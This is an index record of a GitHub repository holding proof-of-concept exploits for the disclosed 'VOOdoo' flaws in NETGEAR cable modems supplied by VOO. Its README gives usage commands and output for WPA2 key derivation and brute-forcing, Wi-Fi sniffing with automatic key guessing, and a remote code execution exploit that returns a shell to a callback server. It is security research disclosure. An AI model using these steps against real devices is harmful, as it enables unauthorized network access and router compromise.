{"id":23075070,"url":"https://github.com/qkaiser/voodoo","last_synced_at":"2025-08-15T17:31:34.403Z","repository":{"id":43141209,"uuid":"345779347","full_name":"qkaiser/voodoo","owner":"qkaiser","description":"This repository holds proof-of-concepts for the VOOdoo vulnerabilities found in NETGEAR CG3100 and CG3700B cable modems provided by VOO to its subscribers.","archived":false,"fork":false,"pushed_at":"2021-04-01T08:48:52.000Z","size":92,"stargazers_count":17,"open_issues_count":0,"forks_count":3,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-03T18:12:55.816Z","etag":null,"topics":["cg3100","cg3700","exploit","netgear","voo","wireless"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/qkaiser.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-03-08T20:01:31.000Z","updated_at":"2024-01-16T16:27:00.000Z","dependencies_parsed_at":"2022-09-02T20:20:53.648Z","dependency_job_id":null,"html_url":"https://github.com/qkaiser/voodoo","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/qkaiser/voodoo","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qkaiser%2Fvoodoo","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qkaiser%2Fvoodoo/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qkaiser%2Fvoodoo/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qkaiser%2Fvoodoo/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/qkaiser","download_url":"https://codeload.github.com/qkaiser/voodoo/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qkaiser%2Fvoodoo/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":270603806,"owners_count":24614572,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-15T02:00:12.559Z","response_time":110,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cg3100","cg3700","exploit","netgear","voo","wireless"],"created_at":"2024-12-16T08:38:29.519Z","updated_at":"2025-08-15T17:31:34.075Z","avatar_url":"https://github.com/qkaiser.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# VOOdoo - Research Notes\n\n![lol](voodoo_logo.png)\n\nThis repository holds proof-of-concepts for the VOOdoo vulnerabilities found in NETGEAR CG3100 and CG3700B cable modems provided by VOO to its subscribers.\n\nThese modems use a weak algorithm to generate WPA2 pre-shared keys, allowing an attacker in reception range of a vulnerable modem to derive the WPA2 pre-shared key from the access point MAC address. The modems are also vulnerable to remote code execution through the web administration panel. The exploit is possible due to usage of default credentials and programming errors in multiple form handlers.\n\nBy chaining these vulnerabilities an attacker can gain unauthorized access to VOO customers LAN (over the Internet or by being in reception range of the access point), fully compromise the router, and leave a persistent backdoor allowing direct remote access to the network.\n\n### SSID generator\n\nGenerate SSID from MAC address similarly to Netgear CG3100 and CG3700B devices.\n\n```\npython3 genssid.py a4:2b:8c:a0:c0:b8\nVOO-984071\n```\n\n### WPA2 PSK Generator\n\nThe *wifi/brutepsk.py* script will generate a list of valid WPA2 PSK candidates by using\na list of observed Netgear OUIs in Wigle and validating them by using the provided\nSSID as an oracle.\n\nWith the current list, you'll get around 120 candidates for a given SSID.\n\n```\ntime python3 brutepsk.py VOO-984071\n--snip--\n[+] Potential candidate found (MAC: 0x001E2AFE426B) - PXBXLGRG\n[+] Potential candidate found (MAC: 0x001E2AFEA994) - XXDOHLZZ\n[+] Potential candidate found (MAC: 0x001F330498FC) - DOPZHBPA\n--snip--\npython3 brutepsk.py VOO-984071  285,18s user 0,03s system 99% cpu 4:45,26 total\n```\n\n### Network Sniffer with Automatic PSK Guesser\n\n**This no longer works since the patch rollout**\n\nYou need to put your wireless interface in monitor mode and start scanning for devices around you using airodump:\n\n```\nsudo airmon-ng wlp6s\nsudo airodump-ng -i wlp6s0mon\n```\n\nWhile doing so, launch the sniffer script and it will list vulnerable access points:\n\n```\nsudo python sniffer.py\nAP MAC: 20:0c:c8:16:76:dc with SSID: VOO-111317 (PSK: VNCKUFXQ)\n```\n\n### Remote Command Execution (local network)\n\nThe callback is made to 192.168.100.2 so you need to set that address explicitly:\n\n```\nip addr add 192.168.100.2/24 dev eno1\nip r add 192.168.100.1 dev eno1 src 192.168.100.2\n```\n\nLaunch the callback server:\n\n```\npython2.7 server.py\n```\n\nRun the exploit:\n\n```\npython2.7 -W ignore exploit.py\n[+] Loading anti-csrf token\n[+] Got anti-csrf token (1756101231)\n[+] Triggering exploit.\n```\n\nIf everything worked as expected:\n\n```\npython2.7 server.py \n[+] Trying to bind to 0.0.0.0 on port 5504: Done\n[+] Waiting for connections on 0.0.0.0:5504: Got connection from 192.168.100.1 on port 1024\n[+] Got connection. Sending payload.\n[*] Switching to interactive mode\n$ help\n!               ?               REM             call            cd             \ndir             find_command    help            history         instances      \nls              man             pwd             sleep           syntax         \nsystem_time     usage           \n----\nClearCmCert     binarySfid      bpiShow         cfg_hex_show    cfg_tlv_show   \nch_state        clear_image     cm_ctrl         comp_mac_to_phy comp_phy_to_mac\ncopy_image      dbc_msg_inject  dload           dsdiag          dsx_show       \nevent_censor    goto_ds         goto_us         igmpShow        ip_initialize  \nip_show         l2vpn_show      link_state      log_messages    map_debug      \nmdd_modify      mdd_sets_show   modem_caps      nrg_mgmt        \noverride_ucd_max_burst          publish_event   rate_shaping_enable            \nreseq_dsid_regress_test         rng_rsp         scan_stop       showFlows      \nstate           stop_download   ucdShow         ucddiag         up_dis         \nus_phy_oh_show  us_target_mset  usdiag          \n----\n[dsxTest] [propane_ctl] \n```\n\n### Remote Command Execution (Internet)\n\n**This no longer works over the Internet since VOO applied mitigations (disabling UPnP, filtering DNS rebinding).** \n\nHowever, everything is available in index.html, and exploit.js if you want to study the code.\n\n\n## Video Demo\n\n![rce demo](voodoo_rce_demo.mp4)\n\n## References\n\n- VOOdoo - Remotely Compromising VOO Cable Modems - [https://quentinkaiser.be/security/2021/03/09/voodoo/](https://quentinkaiser.be/security/2021/03/09/voodoo/)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fqkaiser%2Fvoodoo","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fqkaiser%2Fvoodoo","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fqkaiser%2Fvoodoo/lists"}